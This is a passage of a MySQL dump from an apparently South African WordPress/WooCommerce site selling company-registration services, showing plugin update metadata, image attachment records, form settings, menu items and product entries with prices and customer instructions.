:{s:2:\"1x\";s:79:\"https://ps.w.org/woocommerce-pdf-invoices/assets/banner-772x250.png?rev=1148369\";}s:11:\"banners_rtl\";a:0:{}}s:23:\"wordfence/wordfence.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:23:\"w.org/plugins/wordfence\";s:4:\"slug\";s:9:\"wordfence\";s:6:\"plugin\";s:23:\"wordfence/wordfence.php\";s:11:\"new_version\";s:5:\"7.4.0\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/wordfence/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/wordfence.7.4.0.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:62:\"https://ps.w.org/wordfence/assets/icon-256x256.png?rev=2070855\";s:2:\"1x\";s:54:\"https://ps.w.org/wordfence/assets/icon.svg?rev=2070865\";s:3:\"svg\";s:54:\"https://ps.w.org/wordfence/assets/icon.svg?rev=2070865\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/wordfence/assets/banner-1544x500.jpg?rev=2124102\";s:2:\"1x\";s:64:\"https://ps.w.org/wordfence/assets/banner-772x250.jpg?rev=2124102\";}s:11:\"banners_rtl\";a:0:{}}s:27:\"wp-optimize/wp-optimize.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:25:\"w.org/plugins/wp-optimize\";s:4:\"slug\";s:11:\"wp-optimize\";s:6:\"plugin\";s:27:\"wp-optimize/wp-optimize.php\";s:11:\"new_version\";s:6:\"3.0.11\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/wp-optimize/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/wp-optimize.3.0.11.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/wp-optimize/assets/icon-256x256.png?rev=1552899\";s:2:\"1x\";s:64:\"https://ps.w.org/wp-optimize/assets/icon-128x128.png?rev=1552899\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/wp-optimize/assets/banner-1544x500.png?rev=2125385\";s:2:\"1x\";s:66:\"https://ps.w.org/wp-optimize/assets/banner-772x250.png?rev=2125385\";}s:11:\"banners_rtl\";a:0:{}}}}','no');
/*!40000 ALTER TABLE `wpxb_options` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_postmeta`
--

DROP TABLE IF EXISTS `wpxb_postmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=20520 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_postmeta`
--

LOCK TABLES `wpxb_postmeta` WRITE;
/*!40000 ALTER TABLE `wpxb_postmeta` DISABLE KEYS */;
INSERT INTO `wpxb_postmeta` VALUES (1,2,'_wp_page_template','default'),(2,9,'_wp_attached_file','2016/03/New-Company-registrations-category-image-sqaured.png'),(3,9,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:60:\"2016/03/New-Company-registrations-category-image-sqaured.png\";s:5:\"sizes\";a:7:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:60:\"New-Company-registrations-category-image-sqaured-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"New-Company-registrations-category-image-sqaured-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:60:\"New-Company-registrations-category-image-sqaured-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-100\";a:4:{s:4:\"file\";s:60:\"New-Company-registrations-category-image-sqaured-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-150\";a:4:{s:4:\"file\";s:60:\"New-Company-registrations-category-image-sqaured-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-200\";a:4:{s:4:\"file\";s:60:\"New-Company-registrations-category-image-sqaured-200x200.png\";s:5:\"width\";i:200;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-300\";a:4:{s:4:\"file\";s:60:\"New-Company-registrations-category-image-sqaured-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4,9,'_wp_attachment_image_alt','New Company Registration'),(5,10,'_wp_attached_file','2016/03/Tax-Registration-category-Cover-Final-squared.png'),(6,10,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:57:\"2016/03/Tax-Registration-category-Cover-Final-squared.png\";s:5:\"sizes\";a:7:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:57:\"Tax-Registration-category-Cover-Final-squared-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:57:\"Tax-Registration-category-Cover-Final-squared-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:57:\"Tax-Registration-category-Cover-Final-squared-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-100\";a:4:{s:4:\"file\";s:57:\"Tax-Registration-category-Cover-Final-squared-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-150\";a:4:{s:4:\"file\";s:57:\"Tax-Registration-category-Cover-Final-squared-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-200\";a:4:{s:4:\"file\";s:57:\"Tax-Registration-category-Cover-Final-squared-200x200.png\";s:5:\"width\";i:200;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-300\";a:4:{s:4:\"file\";s:57:\"Tax-Registration-category-Cover-Final-squared-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(7,10,'_wp_attachment_image_alt','Tax Registration'),(11,13,'_edit_last','2'),(12,13,'form_id','13'),(13,13,'form_style','{\"layout\":\"form-vertical\",\"theme\":\"wr-style-light\",\"themes_style\":{\"light\":\"{\\\"background_color\\\":\\\"#ffffff\\\",\\\"background_active_color\\\":\\\"#fcf8e3\\\",\\\"border_thickness\\\":\\\"0\\\",\\\"border_color\\\":\\\"#ffffff\\\",\\\"border_active_color\\\":\\\"#fbeed5\\\",\\\"rounded_corner_radius\\\":\\\"0\\\",\\\"padding_space\\\":\\\"10\\\",\\\"margin_space\\\":\\\"0\\\",\\\"text_color\\\":\\\"#333333\\\",\\\"font_type\\\":\\\"Verdana, Geneva, sans-serif\\\",\\\"font_size\\\":\\\"14\\\",\\\"field_background_color\\\":\\\"#ffffff\\\",\\\"field_border_color\\\":\\\"#b005b0\\\",\\\"field_shadow_color\\\":\\\"#ffffff\\\",\\\"field_text_color\\\":\\\"#0d0c0d\\\",\\\"message_error_background_color\\\":\\\"#b94a48\\\",\\\"message_error_text_color\\\":\\\"#ffffff\\\",\\\"help_text_type\\\":\\\"tooltip\\\",\\\"button_position\\\":\\\"btn-toolbar\\\",\\\"button_submit_color\\\":\\\"btn btn-primary\\\",\\\"button_reset_color\\\":\\\"btn\\\",\\\"button_prev_color\\\":\\\"btn\\\",\\\"button_next_color\\\":\\\"btn\\\",\\\"custom_css\\\":\\\"\\\"}\",\"dark\":\"{\\\"background_color\\\":\\\"#ffffff\\\",\\\"background_active_color\\\":\\\"#444444\\\",\\\"border_thickness\\\":\\\"0\\\",\\\"border_color\\\":\\\"#ffffff\\\",\\\"border_active_color\\\":\\\"#666666\\\",\\\"rounded_corner_radius\\\":\\\"0\\\",\\\"padding_space\\\":\\\"10\\\",\\\"margin_space\\\":\\\"0\\\",\\\"text_color\\\":\\\"#c6c6c6\\\",\\\"font_type\\\":\\\"Verdana, Geneva, sans-serif\\\",\\\"font_size\\\":\\\"14\\\",\\\"field_background_color\\\":\\\"#000000\\\",\\\"field_border_color\\\":\\\"#111111\\\",\\\"field_shadow_color\\\":\\\"#000000\\\",\\\"field_text_color\\\":\\\"#333333\\\",\\\"message_error_background_color\\\":\\\"#b94a48\\\",\\\"message_error_text_color\\\":\\\"#ffffff\\\",\\\"help_text_type\\\":\\\"tooltip\\\",\\\"button_position\\\":\\\"btn-toolbar\\\",\\\"button_submit_color\\\":\\\"btn btn-primary\\\",\\\"button_reset_color\\\":\\\"btn\\\",\\\"button_prev_color\\\":\\\"btn\\\",\\\"button_next_color\\\":\\\"btn\\\",\\\"custom_css\\\":\\\"\\\"}\"},\"themes\":[\"light\",\"dark\"],\"background_color\":\"#ffffff\",\"background_active_color\":\"#fcf8e3\",\"border_thickness\":\"0\",\"border_color\":\"#ffffff\",\"border_active_color\":\"#fbeed5\",\"rounded_corner_radius\":\"0\",\"padding_space\":\"10\",\"margin_space\":\"0\",\"text_color\":\"#333333\",\"font_type\":\"Verdana, Geneva, sans-serif\",\"font_size\":\"14\",\"field_background_color\":\"#ffffff\",\"field_border_color\":\"#b005b0\",\"field_shadow_color\":\"#ffffff\",\"field_text_color\":\"#0d0c0d\",\"message_error_background_color\":\"#b94a48\",\"message_error_text_color\":\"#ffffff\",\"help_text_type\":\"tooltip\",\"button_position\":\"btn-toolbar\",\"button_submit_color\":\"btn btn-primary\",\"button_reset_color\":\"btn\",\"button_prev_color\":\"btn\",\"button_next_color\":\"btn\",\"custom_css\":\"\"}'),(14,13,'form_settings','{\"form_captcha\":\"\",\"form_btn_next_text\":\"Next\",\"form_btn_prev_text\":\"Prev\",\"form_btn_submit_text\":\"Submit\",\"form_btn_reset_text\":\"Reset\",\"form_state_btn_reset_text\":\"No\"}'),(15,13,'form_type','2'),(16,13,'list_email_send_to','a:1:{i:0;s:19:\"imraan@mawinc.co.za\";}'),(17,13,'list_email_send_to_submitter',''),(18,13,'content_email_send_to','a:5:{s:4:\"from\";s:25:\"{$name_23574602122_30_20}\";s:5:\"reply\";s:0:\"\";s:7:\"subject\";s:35:\"{$paragraph_text_17959519822_36_46}\";s:7:\"message\";s:16:\"New registration\";s:6:\"attach\";a:0:{}}'),(19,13,'content_email_send_to_submitter',''),(20,13,'form_post_action_data','a:9:{s:15:\"contactform_url\";s:0:\"\";s:24:\"contactform_show_message\";s:250:\"<div><div><div><div><div><div><div><b>Thanks for your submission<br><br>An email will be sent to you if the name is not available, if it is your company should be registered within 5 within workings.</b><br> </div></div></div></div></div></div></div>\";s:4:\"post\";s:1:\"1\";s:4:\"page\";s:1:\"7\";s:7:\"product\";s:2:\"28\";s:8:\"category\";s:1:\"1\";s:11:\"product_cat\";s:1:\"7\";s:11:\"product_tag\";s:2:\"10\";s:22:\"product_shipping_class\";s:2:\"19\";}'),(21,13,'action_save_submissions','Yes'),(22,13,'form_post_action','contactform_show_message'),(23,13,'mailchimp_settings','{\"use\":\"no\",\"apikey\":\"\",\"lists\":[]}'),(24,13,'_edit_lock','1459173316:1'),(25,2,'_edit_lock','1563903464:1'),(26,14,'_wp_attached_file','2016/03/companyregistration-business-card-e1457804924754.png'),(27,14,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:79;s:4:\"file\";s:60:\"2016/03/companyregistration-business-card-e1457804924754.png\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:59:\"companyregistration-business-card-e1457804924754-300x79.png\";s:5:\"width\";i:300;s:6:\"height\";i:79;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:59:\"companyregistration-business-card-e1457804924754-100x79.png\";s:5:\"width\";i:100;s:6:\"height\";i:79;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"companyregistration-business-card-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:44:\"companyregistration-business-card-300x79.png\";s:5:\"width\";i:300;s:6:\"height\";i:79;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:59:\"companyregistration-business-card-e1457804924754-100x79.png\";s:5:\"width\";i:100;s:6:\"height\";i:79;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:59:\"companyregistration-business-card-e1457804924754-300x79.png\";s:5:\"width\";i:300;s:6:\"height\";i:79;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"companyregistration-business-card-600x169.png\";s:5:\"width\";i:600;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-100\";a:4:{s:4:\"file\";s:44:\"companyregistration-business-card-100x26.png\";s:5:\"width\";i:100;s:6:\"height\";i:26;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-150\";a:4:{s:4:\"file\";s:44:\"companyregistration-business-card-150x39.png\";s:5:\"width\";i:150;s:6:\"height\";i:39;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-200\";a:4:{s:4:\"file\";s:44:\"companyregistration-business-card-200x53.png\";s:5:\"width\";i:200;s:6:\"height\";i:53;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-300\";a:4:{s:4:\"file\";s:44:\"companyregistration-business-card-300x79.png\";s:5:\"width\";i:300;s:6:\"height\";i:79;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-450\";a:4:{s:4:\"file\";s:45:\"companyregistration-business-card-450x118.png\";s:5:\"width\";i:450;s:6:\"height\";i:118;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-600\";a:4:{s:4:\"file\";s:45:\"companyregistration-business-card-600x158.png\";s:5:\"width\";i:600;s:6:\"height\";i:158;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(28,2,'_edit_last','3'),(29,2,'_responsive_layout','default'),(33,14,'_edit_lock','1457804821:1'),(34,14,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:642;s:6:\"height\";i:169;s:4:\"file\";s:37:\"companyregistration-business-card.png\";}}'),(35,14,'su_slide_link',''),(36,14,'_edit_last','1'),(59,4,'_edit_lock','1542117407:1'),(60,4,'_edit_last','1'),(61,4,'_wp_page_template','default'),(62,4,'_responsive_layout','default'),(64,28,'_edit_last','3'),(65,28,'_edit_lock','1565794552:3'),(70,28,'_visibility','visible'),(71,28,'_stock_status','instock'),(72,28,'yikes_woo_products_tabs','a:2:{i:0;a:3:{s:5:\"title\";s:23:\"What are you purchasing\";s:2:\"id\";s:23:\"what-are-you-purchasing\";s:7:\"content\";s:175:\"<ul>\r\n 	<li>Name Reservation</li>\r\n 	<li>Registered Company (COR 14.3, COR 14.1, COR 14.1A, COR15.1A)</li>\r\n 	<li>All documentation required to open a Bank Account</li>\r\n</ul>\";}i:1;a:3:{s:5:\"title\";s:18:\"What do we require\";s:2:\"id\";s:18:\"what-do-we-require\";s:7:\"content\";s:906:\"The following supporting documents are required [once the purchase is made you will receive an email containing these details as well]:\r\n<ul>\r\n 	<li>Certified copy of the identity document of the applicant;</li>\r\n 	<li>Certified copies of the identity documents of the Director/s and Incorporator [this can be the same person];</li>\r\n 	<li>The name confirmation certificate (COR9.4), [we will take care of this]</li>\r\n 	<li>Power of attorney, providing us with the authority to register your company [This will be sent in an email after purchase is made];</li>\r\n 	<li>For trust or company/juristic person as an incorporator, the resolution and certified ID copy of the duly authorised representative must be attached. [We will provide the required resolution/s for signature]</li>\r\n 	<li>Minutes of the meeting authorising the issue of shares [We will provide the required template for signing]</li>\r\n</ul>\";}}'),(73,28,'total_sales','53'),(74,28,'_downloadable','no'),(75,28,'_virtual','yes'),(76,28,'_purchase_note','<h1><span style=\"color: #ff0000\">ACTION REQUIRED</span></h1>\r\n<h2><strong><span style=\"color: #ff0000\">NB:</span></strong></h2>\r\n<h3><span style=\"color: #000000\"><strong>You will require <span style=\"text-decoration: underline\">certified copies</span> of your ID or passport if foreign Directors; to complete the registration process now.</strong></span></h3>\r\n<h3>&nbsp;</h3>\r\n<h3><span style=\"color: #000000\"><strong>If you do not have these now, refer to the email that you will receive to complete the registration process.</strong></span></h3>\r\n<h3>&nbsp;</h3>\r\n<h3><span style=\"color: #000000\"><strong>If you do have it, <a title=\"Registration Form\" href=\"https://companyregistration.online/company-registration-form/\" target=\"_blank\" rel=\"noopener\">click here</a> to complete the registration form.</strong></span></h3>\r\n<p>&nbsp;</p>\r\n<h3>If prompted use the password:</h3>\r\n<h4 style=\"padding-left: 30px\"><span style=\"color: #800080;font-size: 18pt\">company</span></h4>\r\n<h3>to access the form.</h3>\r\n<p>&nbsp;</p>\r\n<h3><span style=\"color: #000000\"><strong>In the event you do not receive the email please contact our office on 010 592 7717 and ask for Zainub.</strong></span></h3>'),(77,28,'_featured','yes'),(78,28,'_weight',''),(79,28,'_length',''),(80,28,'_width',''),(81,28,'_height',''),(82,28,'_sku','CIPC001'),(83,28,'_product_attributes','a:0:{}'),(84,28,'_regular_price','1250'),(85,28,'_sale_price',''),(86,28,'_sale_price_dates_from',''),(87,28,'_sale_price_dates_to',''),(88,28,'_price','1250'),(89,28,'_sold_individually','yes'),(90,28,'_manage_stock','no'),(91,28,'_backorders','no'),(92,28,'_stock',NULL),(19327,28,'_et_pb_use_builder',''),(94,28,'_crosssell_ids','a:4:{i:0;i:78;i:1;i:77;i:2;i:237;i:3;i:75;}'),(95,28,'_product_version','3.6.5'),(96,28,'_product_image_gallery',''),(97,28,'_wc_rating_count','a:0:{}'),(98,28,'_wc_review_count','0'),(99,28,'_wc_average_rating','0'),(100,30,'_menu_item_type','post_type'),(101,30,'_menu_item_menu_item_parent','0'),(102,30,'_menu_item_object_id','2'),(103,30,'_menu_item_object','page'),(104,30,'_menu_item_target',''),(105,30,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(106,30,'_menu_item_xfn',''),(107,30,'_menu_item_url',''),(109,31,'_menu_item_type','post_type'),(110,31,'_menu_item_menu_item_parent','0'),(111,31,'_menu_item_object_id','5'),(112,31,'_menu_item_object','page'),(113,31,'_menu_item_target',''),(114,31,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(115,31,'_menu_item_xfn',''),(116,31,'_menu_item_url',''),(118,32,'_menu_item_type','post_type'),(119,32,'_menu_item_menu_item_parent','0'),(120,32,'_menu_item_object_id','6'),(121,32,'_menu_item_object','page'),(122,32,'_menu_item_target',''),(123,32,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(124,32,'_menu_item_xfn',''),(125,32,'_menu_item_url',''),(127,33,'_menu_item_type','post_type'),(128,33,'_menu_item_menu_item_parent','0'),(129,33,'_menu_item_object_id','7'),(130,33,'_menu_item_object','page'),(131,33,'_menu_item_target',''),(132,33,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(133,33,'_menu_item_xfn',''),(134,33,'_menu_item_url',''),(136,34,'_menu_item_type','post_type'),(137,34,'_menu_item_menu_item_parent','0'),(138,34,'_menu_item_object_id','4'),(139,34,'_menu_item_object','page'),(140,34,'_menu_item_target',''),(141,34,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(142,34,'_menu_item_xfn',''),(143,34,'_menu_item_url',''),(154,36,'_menu_item_type','custom'),(155,36,'_menu_item_menu_item_parent','0'),(156,36,'_menu_item_object_id','36'),(157,36,'_menu_item_object','custom'),(158,36,'_menu_item_target',''),(159,36,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(160,36,'_menu_item_xfn',''),(161,36,'_menu_item_url','#'),(183,45,'_menu_item_type','taxonomy'),(184,45,'_menu_item_menu_item_parent','0'),(185,45,'_menu_item_object_id','8'),(186,45,'_menu_item_object','product_cat'),(187,45,'_menu_item_target',''),(188,45,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(189,45,'_menu_item_xfn',''),(190,45,'_menu_item_url',''),(216,52,'_edit_lock','1459024000:1'),(217,52,'_edit_last','2'),(218,52,'_wp_page_template','default'),(219,52,'_responsive_layout','default'),(254,62,'_edit_lock','1560853391:3'),(255,62,'_edit_last','3'),(256,62,'_visibility','visible'),(257,62,'_stock_status','instock'),(258,62,'yikes_woo_products_tabs','a:2:{i:0;a:3:{s:5:\"title\";s:19:\"What do we require:\";s:2:\"id\";s:18:\"what-do-we-require\";s:7:\"content\";s:592:\"<ul>\r\n 	<li>Certified copies of the identity documents of the Director/s and Incorporator [this can be the same person];</li>\r\n 	<li>Four proposed names in order of preference.</li>\r\n 	<li>Letter of Authority in which you give us the authority to register a company on your behalf, signed by all intended directors.</li>\r\n 	<li>The postal and physical address of the company.</li>\r\n 	<li>Company contact details (this includes email addresses and Telephone numbers)</li>\r\n 	<li>The details of the intended director/s. (this includes addresses, contact numbers and email addresses)</li>\r\n</ul>\";}i:1;a:3:{s:5:\"title\";s:24:\"What are you purchasing?\";s:2:\"id\";s:23:\"what-are-you-purchasing\";s:7:\"content\";s:202:\"•A registration certificate COR 14.3\r\n•A Notice of Incorporation COR 14.1\r\n•Confirmation of the initial directors appointed to the company COR 14.1A\r\n•Memorandum of incorporation (MOI) COR 15.1B\";}}'),(259,62,'total_sales','9'),(260,62,'_downloadable','no'),(261,62,'_virtual','yes'),(262,62,'_purchase_note','<h1><span style=\"color: #ff0000\">ACTION REQUIRED</span></h1>\r\n<h2><strong><span style=\"color: #ff0000\">NB:</span></strong></h2>\r\n<h3><span style=\"color: #000000\"><strong>You will require <span style=\"text-decoration: underline\">certified copies</span> of your ID or passport if foreign Directors; to complete the registration process now.</strong></span></h3>\r\n<h3>&nbsp;</h3>\r\n<h3><span style=\"color: #000000\"><strong>If you do not have these now, refer to the email that you will receive to complete the registration process.</strong></span></h3>\r\n<h3>&nbsp;</h3>\r\n<h3><span style=\"color: #000000\"><strong>If you do have it, <a title=\"Registration Form\" href=\"https://companyregistration.online/company-registration-form/\" target=\"_blank\" rel=\"noopener\">click here</a> to complete the registration form.</strong></span></h3>\r\n<p>&nbsp;</p>\r\n<h3>If prompted use the password:</h3>\r\n<h4 style=\"padding-left: 30px\"><span style=\"color: #800080;font-size: 18pt\">company</span></h4>\r\n<h3>to access the form.</h3>\r\n<p>&nbsp;</p>\r\n<h3><span style=\"color: #000000\"><strong>In the event you do not receive the email please contact our office on 010 592 7717 and ask for Zainub.</strong></span></h3>'),(263,62,'_featured','no'),(264,62,'_weight',''),(265,62,'_length',''),(266,62,'_width',''),(267,62,'_height',''),(268,62,'_sku','CIPC003'),(269,62,'_product_attributes','a:0:{}'),(270,62,'_regular_price','4650.00'),(271,62,'_sale_price',''),(272,62,'_sale_price_dates_from',''),(273,62,'_sale_price_dates_to',''),(274,62,'_price','4650.00'),(275,62,'_sold_individually','yes'),(276,62,'_manage_stock','no'),(277,62,'_backorders','no'),(278,62,'_stock',NULL),(279,62,'_upsell_ids','a:0:{}'),(280,62,'_crosssell_ids','a:0:{}'),(281,62,'_product_version','3.6.4'),(282,62,'_product_image_gallery',''),(283,62,'_wc_rating_count','a:0:{}'),(284,62,'_wc_review_count','0'),(285,62,'_wc_average_rating','0'),(286,64,'_edit_lock','1560853314:3'),(287,64,'_edit_last','1'),(288,64,'_visibility','visible'),(289,64,'_stock_status','instock'),(290,64,'yikes_woo_products_tabs','a:2:{i:0;a:3:{s:5:\"title\";s:19:\"What do we require?\";s:2:\"id\";s:18:\"what-do-we-require\";s:7:\"content\";s:493:\"•The number of directors the company will have along with the ID copies\r\n•Four proposed names in order of preference.\r\n•The postal and physical address of the company.\r\n•Company contact details (this includes email addresses and Telephone numbers)\r\n•The details of the intended director/s. (this includes addresses, contact numbers and email addresses)\r\n•Letter of Authority in which you give us the authority to register a company on your behalf, signed by all intended directors.\";}i:1;a:3:{s:5:\"title\";s:24:\"What are you purchasing?\";s:2:\"id\";s:23:\"what-are-you-purchasing\";s:7:\"content\";s:202:\"•A registration certificate COR 14.3\r\n•A Notice of Incorporation COR 14.1\r\n•Confirmation of the initial directors appointed to the company COR 14.1A\r\n•Memorandum of incorporation (MOI) COR 15.1B\";}}'),(291,64,'total_sales','8'),(292,64,'_downloadable','no'),(293,64,'_virtual','yes'),(294,64,'_purchase_note','<h1><span style=\"color: #ff0000\">ACTION REQUIRED</span></h1>\r\n<h2><strong><span style=\"color: #ff0000\">NB:</span></strong></h2>\r\n<h3><span style=\"color: #000000\"><strong>You will require <span style=\"text-decoration: underline\">certified copies</span> of your ID or passport if foreign Directors; to complete the registration process now.</strong></span></h3>\r\n<h3>&nbsp;</h3>\r\n<h3><span style=\"color: #000000\"><strong>If you do not have these now, refer to the email that you will receive to complete the registration process.</strong></span></h3>\r\n<h3>&nbsp;</h3>\r\n<h3><span style=\"color: #000000\"><strong>If you do have it, <a title=\"Registration Form\" href=\"https://companyregistration.online/company-registration-form/\" target=\"_blank\" rel=\"noopener\">click here</a> to complete the registration form.</strong></span></h3>\r\n<p>&nbsp;</p>\r\n<h3>If prompted use the password:</h3>\r\n<h4 style=\"padding-left: 30px\"><span style=\"color: #800080;font-size: 18pt\">company</span></h4>\r\n<h3>to access the form.</h3>\r\n<p>&nbsp;</p>\r\n<h3><span style=\"color: #000000\"><strong>In the event you do not receive the email please contact our office on 010 592 7717 and ask for Zainub.</strong></span></h3>'),(295,64,'_featured','no'),(296,64,'_weight',''),(297,64,'_length',''),(298,64,'_width',''),(299,64,'_height',''),(300,64,'_sku','CIPC004'),(301,64,'_product_attributes','a:0:{}'),(302,64,'_regular_price','2250'),(303,64,'_sale_price',''),(304,64,'_sale_price_dates_from',''),(305,64,'_sale_price_dates_to',''),(306,64,'_price','2250'),(307,64,'_sold_individually','yes'),(308,64,'_manage_stock','no'),(309,64,'_backorders','no'),(310,64,'_stock',NULL),(311,64,'_upsell_ids','a:0:{}'),(312,64,'_crosssell_ids','a:0:{}'),(313,64,'_product_version','3.3.5'),(314,64,'_product_image_gallery',''),(315,65,'_edit_lock','1526143787:1'),(316,65,'_edit_last','1'),(317,65,'_visibility','visible'),(318,65,'_stock_status','instock'),(319,65,'yikes_woo_products_tabs','a:2:{i:0;a:3:{s:5:\"title\";s:25:\"What are your purchasing?\";s:2:\"id\";s:24:\"what-are-your-purchasing\";s:7:\"content\";s:60:\"<ul>\r\n 	<li>Confirmation of change in director/s</li>\r\n</ul>\";}i:1;a:3:{s:5:\"title\";s:19:\"What do we require?\";s:2:\"id\";s:18:\"what-do-we-require\";s:7:\"content\";s:419:\"<ol>\r\n 	<li>Certified identity copy of applicant.</li>\r\n 	<li>Resolution pertaining to the changes [we will provide this in an email]</li>\r\n 	<li>Notice and minutes if the decision was taken in a meeting [we will provide this in an email]\r\nCertified ID copies of affected directors.</li>\r\n 	<li>Mandate by the company for the third party to submit on behalf of the company [we will provide this in an 